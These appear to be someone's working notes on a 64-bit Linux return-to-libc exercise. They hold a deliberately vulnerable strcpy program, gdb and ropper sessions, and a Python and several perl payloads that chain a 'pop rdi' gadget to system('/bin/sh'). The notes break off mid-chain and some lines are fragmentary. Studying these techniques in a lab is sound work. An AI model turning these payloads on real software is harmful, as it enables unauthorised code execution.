http://shellblade.net/docs/ret2libc.pdf
#include <stdio.h>
void foo(int x)
{
int y;
x++;
y = 4;
}
int main(void)
{
foo(2);
return 0;
}
gef➤ disas main
Dump of assembler code for function main:
0x000000000000060f <+0>: push rbp
0x0000000000000610 <+1>: mov rbp,rsp
0x0000000000000613 <+4>: mov edi,0x2
0x0000000000000618 <+9>: call 0x5fa <foo>
0x000000000000061d <+14>: mov eax,0x0
0x0000000000000622 <+19>: pop rbp
0x0000000000000623 <+20>: ret
End of assembler dump.
$ cat $HOME/.gdbinit
source /home/lasalle/.gdbinit-gef.py
echo "set disas intel" >> $HOME/.gdbinit
gef➤ disas main
Dump of assembler code for function main:
0x000000000000060f <+0>: push rbp
0x0000000000000610 <+1>: mov rbp,rsp
0x0000000000000613 <+4>: mov edi,0x2
0x0000000000000618 <+9>: call 0x5fa <foo>
0x000000000000061d <+14>: mov eax,0x0
0x0000000000000622 <+19>: pop rbp
0x0000000000000623 <+20>: ret
End of assembler dump.
ef➤ disas foo
Dump of assembler code for function foo:
0x00000000000005fa <+0>: push rbp
0x00000000000005fb <+1>: mov rbp,rsp
0x00000000000005fe <+4>: mov DWORD PTR [rbp-0x14],edi
0x0000000000000601 <+7>: add DWORD PTR [rbp-0x14],0x1
0x0000000000000605 <+11>: mov DWORD PTR [rbp-0x4],0x4
0x000000000000060c <+18>: nop
0x000000000000060d <+19>: pop rbp
0x000000000000060e <+20>: ret
End of assembler dump.
gef➤ p system
$1 = {int (const char *)} 0x7ffff7a33440 <__libc_system>
gef➤ p exit
$2 = {void (int)} 0x7ffff7a27120 <__GI_exit>
$ ./setup
Estimated address: 0x7ffefbd9de86
gef➤ p system
$1 = {int (const char *)} 0x7ffff7a33440 <__libc_system>
gef➤ p exit
$2 = {void (int)} 0x7ffff7a27120 <__GI_exit>
gef➤
x/4s 0x7ffefbd9de86
0x7fffffffea21
gcc -fno-stack-protector setup.c -o setup
Estimated address: 0x7ffe0b533e86
x/4s 0x7ffe0b533e86
64-bit Linux stack smashing tutorial: Part 1
https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/
64-bit Linux stack smashing tutorial: Part 2
https://blog.techorganic.com/2015/04/21/64-bit-linux-stack-smashing-tutorial-part-2/
64-bit Linux stack smashing tutorial: Part 3
https://blog.techorganic.com/2016/03/18/64-bit-linux-stack-smashing-tutorial-part-3/
install Ropper - https://github.com/sashs/Ropper
install filebytes - https://github.com/sashs/filebytes
sudo -H pip install keystone-engine
$ cat /proc/sys/kernel/randomize_va_space
2
ropper --file bug --search "% ?di"
0x0000000000000783: pop rdi; ret;
0x0000000000000783 # pop rdi; ret;
$ cat ~/.gdbinit
source /home/lasalle/.gdbinit-gef.py
set disas intel
source ~/peda/peda.py
$ cat ~/.gdbinit
source ~/peda/peda.py
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x55555555480f --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x55555575480f --> 0x68732f6e69622f ('/bin/sh')
libc : 0x7ffff7b97e9a --> 0x68732f6e69622f ('/bin/sh')
gdb-peda$
0x55480f --> /bin/sh string
$ ropper --file ret2libc --search "% ?di"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: % ?di
[INFO] File: ret2libc
0x0000000000000700: call 0x590; lea rdi, [rip + 0xe3]; call 0x580; mov eax, 0; leave; ret;
0x0000000000000706: lea edi, [rip + 0xe3]; call 0x580; mov eax, 0; leave; ret;
0x0000000000000705: lea rdi, [rip + 0xe3]; call 0x580; mov eax, 0; leave; ret;
0x00000000000007b3: pop rdi; ret;
0x00000000000007b3 --> pop rdi
gdb-peda$ p system
$2 = {int (const char *)} 0x7ffff7a33440 <__libc_system>
0x7ffff7a33440 --> system()
gcc -no-pie -fno-stack-protector ret2libc.c -o ret2libc
b4551k5 Christoph Groß • a year ago
It seems that gcc build PIE (position indep. exec.). You can check this using "readelf -e <executable>". If at the top (the header), Type is "DYN (shared..." then it is PIE and gets loaded at random base address. You can rebuild the code using "-no-pie" as compile flag to tell the linker you want to build an executable. This should result in 0x400000 as base address as in the examples above.
gdb-peda$ p system
$2 = {int (const char *)} 0x7ffff7a33440 <__libc_system>
lasalle@lasalle-VirtualBox:~/workspaces19/ret2libc$ ropper --file ret2libc --search "% ?di"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: % ?di
[INFO] File: ret2libc
0x00000000004004e4: add byte ptr [rax], al; test rax, rax; je 0x4f8; pop rbp; mov edi, 0x601040; jmp rax;
0x0000000000400526: add byte ptr [rax], al; test rax, rax; je 0x538; pop rbp; mov edi, 0x601040; jmp rax;
0x00000000004005ad: call 0x470; lea rdi, [rip + 0xe6]; call 0x460; mov eax, 0; leave; ret;
0x00000000004004e9: je 0x4f8; pop rbp; mov edi, 0x601040; jmp rax;
0x000000000040052b: je 0x538; pop rbp; mov edi, 0x601040; jmp rax;
0x00000000004005b3: lea edi, [rip + 0xe6]; call 0x460; mov eax, 0; leave; ret;
0x00000000004005b2: lea rdi, [rip + 0xe6]; call 0x460; mov eax, 0; leave; ret;
0x00000000004004ec: mov edi, 0x601040; jmp rax;
0x00000000004005ae: mov esi, 0x48fffffe; lea edi, [rip + 0xe6]; call 0x460; mov eax, 0; leave; ret;
0x00000000004004eb: pop rbp; mov edi, 0x601040; jmp rax;
0x0000000000400663: pop rdi; ret;
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006bf --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006bf --> 0x68732f6e69622f ('/bin/sh')
libc : 0x7ffff7b97e9a --> 0x68732f6e69622f ('/bin/sh')
bug.py
#!/usr/bin/env python
from struct import *
buf = ""
buf += "A"*104 # junk
buf += pack("<Q", 0x0000000000400663) # pop rdi; ret;
buf += pack("<Q", 0x4006bf) # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a33440) # address of system()
f = open("in.txt", "w")
f.write(buf)
gdb-peda$ br *vuln+77
Breakpoint 1 at 0x4005c4
gdb-peda$ r < in.txt
Stuck with this issue
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff7a332e6 <do_system+1078>: movq xmm0,QWORD PTR [rsp+0x8]
0x7ffff7a332ec <do_system+1084>: mov QWORD PTR [rsp+0x8],rax
0x7ffff7a332f1 <do_system+1089>: movhps xmm0,QWORD PTR [rsp+0x8]
=> 0x7ffff7a332f6 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
0x7ffff7a332fb <do_system+1099>: call 0x7ffff7a23110 <__GI___sigaction>
0x7ffff7a33300 <do_system+1104>: lea rsi,[rip+0x39e2f9] # 0x7ffff7dd1600 <quit>
0x7ffff7a33307 <do_system+1111>: xor edx,edx
0x7ffff7a33309 <do_system+1113>: mov edi,0x3
Going back to try bug.c using ropper and gdb-peda and -no-pie (to get address of system properly)
http://shellblade.net/docs/ret2libc.pdf
https://github.com/superkojiman/dc416-exploitdev-intro/blob/master/x64-asm-cheatsheet.pdf
#include <stdio.h>
#include <string.h>
void bug(char *arg1)
{
char name[128];
strcpy(name, arg1);
printf("Hello %s\n", name);
}
int main(int argc, char **argv)
{
if (argc < 2)
{
printf("Usage: %s <your name>\n", argv[0]);
return 0;
}
bug(argv[1]);
return 0;
}
gcc -no-pie -fno-stack-protector bug.c -o bug
gdb-peda$ disas bug
Dump of assembler code for function bug:
0x0000000000400537 <+0>: push rbp
0x0000000000400538 <+1>: mov rbp,rsp
0x000000000040053b <+4>: sub rsp,0x90
0x0000000000400542 <+11>: mov QWORD PTR [rbp-0x88],rdi
0x0000000000400549 <+18>: mov rdx,QWORD PTR [rbp-0x88]
0x0000000000400550 <+25>: lea rax,[rbp-0x80]
0x0000000000400554 <+29>: mov rsi,rdx
0x0000000000400557 <+32>: mov rdi,rax
0x000000000040055a <+35>: call 0x400430 <strcpy@plt>
0x000000000040055f <+40>: lea rax,[rbp-0x80]
0x0000000000400563 <+44>: mov rsi,rax
0x0000000000400566 <+47>: lea rdi,[rip+0xe7] # 0x400654
0x000000000040056d <+54>: mov eax,0x0
0x0000000000400572 <+59>: call 0x400440 <printf@plt>
0x0000000000400577 <+64>: nop
0x0000000000400578 <+65>: leave
0x0000000000400579 <+66>: ret
End of assembler dump.
r `perl -e 'print "A"x144'`
RBP: 0x7fffffffdf00 (0x00007fffffffdf00)
RSP: 0x7fffffffdf08 --> 0x4005c4 (<main+74>: mov eax,0x0)
RIP: 0x400579 (<bug+66>: ret)
cheat sheet https://github.com/superkojiman/dc416-exploitdev-intro
https://github.com/superkojiman/dc416-exploitdev-intro/blob/master/x64-asm-cheatsheet.pdf
ret --> pop rip
current rip --> RIP: 0x400579 (<bug+66>: ret)
value on the stack --> 0000| 0x7fffffffdf08 --> 0x4005c4 (<main+74>: mov eax,0x0)
it will go back to main
after si
register
RIP: 0x4005c4 (<main+74>: mov eax,0x0)
stack
0000| 0x7fffffffdf10 --> 0x7fffffffe008 --> 0x7fffffffe339 ("/home/lasalle/workspaces19/ret2libc/bug")
r `perl -e 'print "A"x128'`
RBP: 0x7fffffffdf00 (0x00007fffffffdf00) - base pointer of stack - 8 bytes
RSP: 0x7fffffffdf08 --> 0x4005c4 (<main+74>: mov eax,0x0) - to pop in rip by ret
b *bug+66
r `perl -e 'print "A"x128,"B"x4'` --> plus 8 bytes - will go to RBP
register
RBP: 0x7f0042424242 --> base pointer of stack is overwritten
RSP: 0x7fffffffdf08 --> 0x4005c4 (<main+74>: mov eax,0x0) --> still points to main
RIP: 0x400579 (<bug+66>: ret) ---> current instruction
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdf08 --> 0x4005c4 (<main+74>: mov eax,0x0)
0008| 0x7fffffffdf10 --> 0x7fffffffe008 --> 0x7fffffffe335 ("/home/lasalle/workspaces19/ret2libc/bug")
0016| 0x7fffffffdf18 --> 0x200000000
if RBP is messed up, it iwll still break. so putting the RIP to jump somewhere will continue the process
gdb-peda$ r `perl -e 'print "A"x128,"B"x8'`
RBP is overwritten
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffdf08 --> 0x400500 (<__do_global_dtors_aux>: cmp BYTE PTR [rip+0x200b31],0x0 # 0x601038 <completed.7697>)
RIP: 0x400579 (<bug+66>: ret)
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdf08 --> 0x400500 (<__do_global_dtors_aux>: cmp BYTE PTR [rip+0x200b31],0x0 # 0x601038 <completed.7697>)
0008| 0x7fffffffdf10 --> 0x7fffffffe008 --> 0x7fffffffe331 ("/home/lasalle/workspaces19/ret2libc/bug")
0016| 0x7fffffffdf18 --> 0x200000000
[-------------------------------------code-------------------------------------]
0x400572 <bug+59>: call 0x400440 <printf@plt>
0x400577 <bug+64>: nop
0x400578 <bug+65>: leave
=> 0x400579 <bug+66>: ret
0x40057a <main>: push rbp
0x40057b <main+1>: mov rbp,rsp
0x40057e <main+4>: sub rsp,0x10
0x400582 <main+8>: mov DWORD PTR [rbp-0x4],edi
c
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x601038 --> 0x1
RBX: 0x0
RCX: 0x0
RDX: 0x0
RSI: 0x602260 ("Hello ", 'A' <repeats 128 times>, "BBBBBBBB\n")
RDI: 0x1
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffdf18 --> 0x200000000
RIP: 0x7fffffffe008 --> 0x7fffffffe331 ("/home/lasalle/workspaces19/ret2libc/bug")
R8 : 0x0
R9 : 0x88
R10: 0xffffff78
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe000 --> 0x2
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7fffffffe002: add BYTE PTR [rax],al
0x7fffffffe004: add BYTE PTR [rax],al
0x7fffffffe006: add BYTE PTR [rax],al
=> 0x7fffffffe008: xor ebx,esp
0x7fffffffe00a: (bad)
0x7fffffffe00b: (bad)
0x7fffffffe00c: (bad)
0x7fffffffe00d: jg 0x7fffffffe00f
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdf18 --> 0x200000000
0008| 0x7fffffffdf20 --> 0x4005d0 (<__libc_csu_init>: push r15)
0016| 0x7fffffffdf28 --> 0x7ffff7a05b97 (<__libc_start_main+231>: mov edi,eax)
0024| 0x7fffffffdf30 --> 0x2
0032| 0x7fffffffdf38 --> 0x7fffffffe008 --> 0x7fffffffe331 ("/home/lasalle/workspaces19/ret2libc/bug")
0040| 0x7fffffffdf40 --> 0x200008000
0048| 0x7fffffffdf48 --> 0x40057a (<main>: push rbp)
0056| 0x7fffffffdf50 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffffffe008 in ?? ()
gdb-peda$
gdb-peda$ p system
$1 = {int (const char *)} 0x7ffff7a33440 <__libc_system>
gdb-peda$
jump to system
gdb-peda$ r `perl -e 'print "A"x128,"B"x8'`
gdb-peda$ p system
$3 = {int (const char *)} 0x7ffff7a33440 <__libc_system>
gdb-peda$ p exit
$4 = {void (int)} 0x7ffff7a27120 <__GI_exit>
gdb-peda$
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x40\x34\xa3\xf7\xff\x7f"'`
[----------------------------------registers-----------------------------------]
RAX: 0x95
RBX: 0x0
RCX: 0x0
RDX: 0x0
RSI: 0x602260 ("Hello ", 'A' <repeats 128 times>, "BBBBBBBB@4\243\367\377\177\n")
RDI: 0x1
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffdef8 --> 0x7ffff7a33440 (<__libc_system>: test rdi,rdi)
RIP: 0x400579 (<bug+66>: ret)
R8 : 0x0
R9 : 0x8e
R10: 0xffffff72
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdff0 --> 0x2
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400572 <bug+59>: call 0x400440 <printf@plt>
0x400577 <bug+64>: nop
0x400578 <bug+65>: leave
=> 0x400579 <bug+66>: ret
0x40057a <main>: push rbp
0x40057b <main+1>: mov rbp,rsp
0x40057e <main+4>: sub rsp,0x10
0x400582 <main+8>: mov DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdef8 --> 0x7ffff7a33440 (<__libc_system>: test rdi,rdi)
0008| 0x7fffffffdf00 --> 0x7fffffffdff8 --> 0x7fffffffe32b ("/home/lasalle/workspaces19/ret2libc/bug")
0016| 0x7fffffffdf08 --> 0x200000000
0024| 0x7fffffffdf10 --> 0x4005d0 (<__libc_csu_init>: push r15)
0032| 0x7fffffffdf18 --> 0x7ffff7a05b97 (<__libc_start_main+231>: mov edi,eax)
0040| 0x7fffffffdf20 --> 0x2
0048| 0x7fffffffdf28 --> 0x7fffffffdff8 --> 0x7fffffffe32b ("/home/lasalle/workspaces19/ret2libc/bug")
0056| 0x7fffffffdf30 --> 0x200008000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0000000000400579 in bug ()
gdb-peda$ si
[----------------------------------registers-----------------------------------]
RAX: 0x95
RBX: 0x0
RCX: 0x0
RDX: 0x0
RSI: 0x602260 ("Hello ", 'A' <repeats 128 times>, "BBBBBBBB@4\243\367\377\177\n")
RDI: 0x1
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffdf00 --> 0x7fffffffdff8 --> 0x7fffffffe32b ("/home/lasalle/workspaces19/ret2libc/bug")
RIP: 0x7ffff7a33440 (<__libc_system>: test rdi,rdi)
R8 : 0x0
R9 : 0x8e
R10: 0xffffff72
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdff0 --> 0x2
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff7a33439 <cancel_handler+217>: pop rbx
0x7ffff7a3343a <cancel_handler+218>: ret
0x7ffff7a3343b: nop DWORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a33440 <__libc_system>: test rdi,rdi
0x7ffff7a33443 <__libc_system+3>: je 0x7ffff7a33450 <__libc_system+16>
0x7ffff7a33445 <__libc_system+5>: jmp 0x7ffff7a32eb0 <do_system>
0x7ffff7a3344a <__libc_system+10>: nop WORD PTR [rax+rax*1+0x0]
0x7ffff7a33450 <__libc_system+16>: lea rdi,[rip+0x164a4b] # 0x7ffff7b97ea2
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdf00 --> 0x7fffffffdff8 --> 0x7fffffffe32b ("/home/lasalle/workspaces19/ret2libc/bug")
0008| 0x7fffffffdf08 --> 0x200000000
0016| 0x7fffffffdf10 --> 0x4005d0 (<__libc_csu_init>: push r15)
0024| 0x7fffffffdf18 --> 0x7ffff7a05b97 (<__libc_start_main+231>: mov edi,eax)
0032| 0x7fffffffdf20 --> 0x2
0040| 0x7fffffffdf28 --> 0x7fffffffdff8 --> 0x7fffffffe32b ("/home/lasalle/workspaces19/ret2libc/bug")
0048| 0x7fffffffdf30 --> 0x200008000
0056| 0x7fffffffdf38 --> 0x40057a (<main>: push rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
__libc_system (line=0x1 <error: Cannot access memory at address 0x1>) at ../sysdeps/posix/system.c:180
180 ../sysdeps/posix/system.c: No such file or directory.
gdb-peda$
cannot access 0x1 in system. could be that it is expecting the exit address
gdb-peda$ p system
$3 = {int (const char *)} 0x7ffff7a33440 <__libc_system>
gdb-peda$ p exit
$4 = {void (int)} 0x7ffff7a27120 <__GI_exit>
gdb-peda$
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x40\x34\xa3\xf7\xff\x7f","\x20\x71\xa2\xf7\xff\x7f"'`
"\x20\x71\xa2\xf7\xff\x7f"
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x40\x34\xa3\xf7\xff\x7f","\x20\x71\xa2\xf7\xff\x7f"'`
Starting program: /home/lasalle/workspaces19/ret2libc/bug `perl -e 'print "A"x128,"B"x8,"\x40\x34\xa3\xf7\xff\x7f","\x20\x71\xa2\xf7\xff\x7f"'`
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB@4���
[----------------------------------registers-----------------------------------]
RAX: 0x95
RBX: 0x0
RCX: 0x0
RDX: 0x0
RSI: 0x602260 ("Hello ", 'A' <repeats 128 times>, "BBBBBBBB@4\243\367\377\177\n")
RDI: 0x1
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffdee8 --> 0x7ffff7a33440 (<__libc_system>: test rdi,rdi)
RIP: 0x400579 (<bug+66>: ret)
R8 : 0x0
R9 : 0x8e
R10: 0xffffff72
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdfe0 --> 0x3
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400572 <bug+59>: call 0x400440 <printf@plt>
0x400577 <bug+64>: nop
0x400578 <bug+65>: leave
=> 0x400579 <bug+66>: ret
0x40057a <main>: push rbp
0x40057b <main+1>: mov rbp,rsp
0x40057e <main+4>: sub rsp,0x10
0x400582 <main+8>: mov DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdee8 --> 0x7ffff7a33440 (<__libc_system>: test rdi,rdi)
0008| 0x7fffffffdef0 --> 0x7fffffffdfe8 --> 0x7fffffffe325 ("/home/lasalle/workspaces19/ret2libc/bug")
0016| 0x7fffffffdef8 --> 0x300000000
0024| 0x7fffffffdf00 --> 0x4005d0 (<__libc_csu_init>: push r15)
0032| 0x7fffffffdf08 --> 0x7ffff7a05b97 (<__libc_start_main+231>: mov edi,eax)
0040| 0x7fffffffdf10 --> 0x3
0048| 0x7fffffffdf18 --> 0x7fffffffdfe8 --> 0x7fffffffe325 ("/home/lasalle/workspaces19/ret2libc/bug")
0056| 0x7fffffffdf20 --> 0x300008000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0000000000400579 in bug ()
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x40\x34\xa3\xf7\xff\x7f","\x20\x71\xa2\xf7\xff\x7f"'`
Starting program: /home/lasalle/workspaces19/ret2libc/bug `perl -e 'print "A"x128,"B"x8,"\x40\x34\xa3\xf7\xff\x7f","\x20\x71\xa2\xf7\xff\x7f"'`
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB@4���
[----------------------------------registers-----------------------------------]
RAX: 0x95
RBX: 0x0
RCX: 0x0
RDX: 0x0
RSI: 0x602260 ("Hello ", 'A' <repeats 128 times>, "BBBBBBBB@4\243\367\377\177\n")
RDI: 0x1
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffdee8 --> 0x7ffff7a33440 (<__libc_system>: test rdi,rdi)
RIP: 0x400579 (<bug+66>: ret)
R8 : 0x0
R9 : 0x8e
R10: 0xffffff72
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdfe0 --> 0x3
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400572 <bug+59>: call 0x400440 <printf@plt>
0x400577 <bug+64>: nop
0x400578 <bug+65>: leave
=> 0x400579 <bug+66>: ret
0x40057a <main>: push rbp
0x40057b <main+1>: mov rbp,rsp
0x40057e <main+4>: sub rsp,0x10
0x400582 <main+8>: mov DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdee8 --> 0x7ffff7a33440 (<__libc_system>: test rdi,rdi)
0008| 0x7fffffffdef0 --> 0x7fffffffdfe8 --> 0x7fffffffe325 ("/home/lasalle/workspaces19/ret2libc/bug")
0016| 0x7fffffffdef8 --> 0x300000000
0024| 0x7fffffffdf00 --> 0x4005d0 (<__libc_csu_init>: push r15)
0032| 0x7fffffffdf08 --> 0x7ffff7a05b97 (<__libc_start_main+231>: mov edi,eax)
0040| 0x7fffffffdf10 --> 0x3
0048| 0x7fffffffdf18 --> 0x7fffffffdfe8 --> 0x7fffffffe325 ("/home/lasalle/workspaces19/ret2libc/bug")
0056| 0x7fffffffdf20 --> 0x300008000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0000000000400579 in bug ()
gdb-peda$ si
[----------------------------------registers-----------------------------------]
RAX: 0x95
RBX: 0x0
RCX: 0x0
RDX: 0x0
RSI: 0x602260 ("Hello ", 'A' <repeats 128 times>, "BBBBBBBB@4\243\367\377\177\n")
RDI: 0x1
RBP: 0x4242424242424242 ('BBBBBBBB')
RSP: 0x7fffffffdef0 --> 0x7fffffffdfe8 --> 0x7fffffffe325 ("/home/lasalle/workspaces19/ret2libc/bug")
RIP: 0x7ffff7a33440 (<__libc_system>: test rdi,rdi)
R8 : 0x0
R9 : 0x8e
R10: 0xffffff72
R11: 0x246
R12: 0x400450 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdfe0 --> 0x3
R14: 0x0
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff7a33439 <cancel_handler+217>: pop rbx
0x7ffff7a3343a <cancel_handler+218>: ret
0x7ffff7a3343b: nop DWORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a33440 <__libc_system>: test rdi,rdi
0x7ffff7a33443 <__libc_system+3>: je 0x7ffff7a33450 <__libc_system+16>
0x7ffff7a33445 <__libc_system+5>: jmp 0x7ffff7a32eb0 <do_system>
0x7ffff7a3344a <__libc_system+10>: nop WORD PTR [rax+rax*1+0x0]
0x7ffff7a33450 <__libc_system+16>: lea rdi,[rip+0x164a4b] # 0x7ffff7b97ea2
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdef0 --> 0x7fffffffdfe8 --> 0x7fffffffe325 ("/home/lasalle/workspaces19/ret2libc/bug")
0008| 0x7fffffffdef8 --> 0x300000000
0016| 0x7fffffffdf00 --> 0x4005d0 (<__libc_csu_init>: push r15)
0024| 0x7fffffffdf08 --> 0x7ffff7a05b97 (<__libc_start_main+231>: mov edi,eax)
0032| 0x7fffffffdf10 --> 0x3
0040| 0x7fffffffdf18 --> 0x7fffffffdfe8 --> 0x7fffffffe325 ("/home/lasalle/workspaces19/ret2libc/bug")
0048| 0x7fffffffdf20 --> 0x300008000
0056| 0x7fffffffdf28 --> 0x40057a (<main>: push rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
__libc_system (line=0x1 <error: Cannot access memory at address 0x1>) at ../sysdeps/posix/system.c:180
180 ../sysdeps/posix/system.c: No such file or directory.
gdb-peda$ find '/bin/sh'
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b97e9a --> 0x68732f6e69622f ('/bin/sh')
gdb-peda$
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x40\x34\xa3\xf7\xff\x7f","\x20\x71\xa2\xf7\xff\x7f","\x2f\x62\x69\x6e\x2f\x73\x68"'`
"\x2f\x62\x69\x6e\x2f\x73\x68"
Thread 2.1 "bug" received signal SIGSEGV, Segmentation fault.
[Switching to process 11319]
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff7b97e97 --> 0x2f6e69622f00632d ('-c')
RBX: 0x0
RCX: 0x7ffff7b97e9f --> 0x2074697865006873 ('sh')
RDX: 0x0
RSI: 0x7ffff7dd16a0 --> 0x0
RDI: 0x2
RBP: 0x7fffffffdda8 --> 0x0
RSP: 0x7fffffffdd48 --> 0x0
RIP: 0x7ffff7a332f6 (<do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0)
R8 : 0x7ffff7dd1600 --> 0x0
R9 : 0x8e
R10: 0x8
R11: 0x246
R12: 0x1
R13: 0x7fffffffdfd0 --> 0x3
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff7a332e6 <do_system+1078>: movq xmm0,QWORD PTR [rsp+0x8]
0x7ffff7a332ec <do_system+1084>: mov QWORD PTR [rsp+0x8],rax
0x7ffff7a332f1 <do_system+1089>: movhps xmm0,QWORD PTR [rsp+0x8]
=> 0x7ffff7a332f6 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
0x7ffff7a332fb <do_system+1099>: call 0x7ffff7a23110 <__GI___sigaction>
0x7ffff7a33300 <do_system+1104>: lea rsi,[rip+0x39e2f9] # 0x7ffff7dd1600 <quit>
0x7ffff7a33307 <do_system+1111>: xor edx,edx
0x7ffff7a33309 <do_system+1113>: mov edi,0x3
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdd48 --> 0x0
0008| 0x7fffffffdd50 --> 0x7ffff7b97e97 --> 0x2f6e69622f00632d ('-c')
0016| 0x7fffffffdd58 --> 0x7ffff7a48f26 (<__printf+166>: mov rcx,QWORD PTR [rsp+0x18])
0024| 0x7fffffffdd60 --> 0x10
0032| 0x7fffffffdd68 --> 0x7ffff7a33360 (<cancel_handler>: push rbx)
0040| 0x7fffffffdd70 --> 0x7fffffffdd64 --> 0xf7a3336000000000
0048| 0x7fffffffdd78 --> 0xd710d0935f41f200
0056| 0x7fffffffdd80 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffff7a332f6 in do_system (line=0x1 <error: Cannot access memory at address 0x1>)
at ../sysdeps/posix/system.c:125
125 in ../sysdeps/posix/system.c
gdb-peda$ r `perl -e 'print "A"x128,"B"x8,"\x62\x06\x40\x00\x00\x00\x00\x00","\x40\x34\xa3\xf7\xff\x7f","\x20\x71\xa2\xf7\xff\x7f","\x2f\x62\x69\x6e\x2f\x73\x68"'`
https://www.tiandiwuji.top/posts/32791/
0x 00 00 00 00 00 40 06 62: pop r15; ret;
"\x62\x06\x40\x00\x00\x00\x00\x00"
https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
sys_execve
sys_execve const char *filename const char *const argv[] const char *const envp[]
%rax System call %rdi %rsi %rdx
https://jameshfisher.com/2017/02/05/how-do-i-use-execve-in-c/
exec.c
#include <stdio.h>
#include <unistd.h>
int main(void) {
printf("Main program started\n");
char* argv[] = { NULL };
char* envp[] = { NULL };
execve("/bin/sh", argv, envp);
perror("Could not execve");
return 1;
}
cc main.c -o main
pop rdi /bin/sh
pop rsi 0h - NULL
pop rax. 0h - NULL
mov rsi, rax
Guessed arguments:
arg[0]: 0x555555554794 --> 0x68732f6e69622f ('/bin/sh')
arg[1]: 0x7fffffffdf88 --> 0x0
